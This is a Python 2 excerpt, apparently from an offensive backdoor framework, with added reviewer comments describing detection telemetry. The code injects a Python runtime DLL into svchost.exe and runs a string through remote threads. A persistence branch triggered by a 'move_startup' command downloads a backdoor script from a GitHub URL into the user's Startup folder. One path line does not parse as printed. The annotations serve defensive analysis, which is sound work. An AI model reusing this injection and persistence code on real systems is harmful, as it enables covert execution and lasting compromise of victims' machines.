def alloc_string(pid, addr, value):
    """Allocate a buffer in process *pid* and write *value* plus a line feed into it.

    NOTE(review): the page shows this definition collapsed onto one line;
    the layout below is reconstructed from Python 2 syntax and the
    definition may continue beyond what is visible. `Process` and `HexDump`
    are not defined in this excerpt; the method names match the WinAppDbg
    library -- confirm against the file's imports.

    Nothing is returned in the visible body, so the address of the new
    buffer is not handed back to the caller here.
    """
    # Parsed as a hexadecimal address, but never used in the visible body.
    x = int(addr, 16)
    process = Process(pid)
    # Cross-process allocation: one byte more than the length of the value.
    lpNewAddr = process.malloc(len(value) + 1)
    # The extra byte is filled by this appended line feed (0x0a).
    newval = value + '\x0a'
    # Debug output: hex dump of exactly what is about to be written.
    print HexDump.hexadecimal(newval, '\\x')
    try:
        # Cross-process write into the buffer allocated above.
        process.write(lpNewAddr, newval)
    except Exception, e:
        # Release the remote buffer on failure, then re-raise the original
        # error; `e` itself is not used.
        process.free(lpNewAddr)
        raise
# NOTE(review): the page shows this run collapsed onto one line; the layout
# below is reconstructed from Python 2 syntax, and the enclosing scope (any
# outer function, loop or `if`) is not visible. `s`, `python_dll`,
# `python_lib`, `dados` and `file_name` are defined outside this excerpt.
#
# What the visible code does, for analysts: it loads a Python runtime DLL
# into a running svchost.exe and executes a Python string inside it through
# remote threads. Telemetry this produces: cross-process memory allocation
# and writes into svchost.exe, remote thread creation in svchost.exe, a
# Python DLL appearing in svchost.exe's module list, and an svchost.exe
# child spawned by svchost.exe rather than by services.exe.

# Enumerate processes and take the first match for svchost.exe.
s.scan_processes()
pl = s.find_processes_by_filename("svchost.exe")
# presumably each entry is a (process, filename) pair -- confirm
pid = pl[0][0].get_pid()
p = Process(pid)
print('pid', pid)
print('arch', p.get_bits())
# Load the DLL named by python_dll into the target; `t` is not used afterwards
# in the visible code.
t = p.inject_dll(python_dll)
# Refresh the module list so the newly loaded module can be looked up.
p.scan_modules()
m = p.get_module_by_name(python_lib)
# Both names are CPython C-API entry points: interpreter initialisation and
# "run this source string".
init = m.resolve("Py_InitializeEx")
pyrun = m.resolve("PyRun_SimpleString")
print(init, pyrun)
# Remote thread #1: Py_InitializeEx with 0 as its argument.
p.start_thread(init, 0)
# Fixed delay instead of waiting on the thread; presumably to let
# initialisation finish -- confirm.
time.sleep(0.1)
# Source string that the injected interpreter is asked to run.
sh = 'import subprocess; subprocess.call("svchost.exe")'
# Copy the string into the target's memory, then remote thread #2 calls
# PyRun_SimpleString on that address.
addr = p.malloc(len(sh))
p.write(addr, sh)
p.start_thread(pyrun, addr)

# Moving the backdoor to the startup folder
# Persistence step. `dados` (Portuguese for "data") is presumably the command
# string received by the backdoor -- confirm. Telemetry: a script fetching
# from raw.githubusercontent.com and a new file created in the per-user
# Startup folder.
if dados.startswith("move_startup"):
    url = "https://raw.githubusercontent.com/DedSec-F0x/DedSec-Framework/master/exploit/python/backdoortop.py"
    user = getpass.getuser()
    # NOTE(review): reproduced exactly as it appears on the page; as printed
    # this line does not parse as Python.
    os.chdir("C:\Users\" + user + "AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\")
    u = urllib2.urlopen(url)
    # Opened for binary write; if file_name is relative it resolves against
    # the directory selected by the chdir above.
    f = open(file_name, 'wb')
    meta = u.info()
    # Expected size is taken from the response's Content-Length header.
    file_size = int(meta.getheaders("Content-Length")[0])
    print "Downloading: %s Bytes: %s" % (file_name, file_size)
    # Byte counter and 8 KiB chunk size; the loop that uses them is outside
    # this excerpt.
    file_size_dl = 0
    block_sz = 8192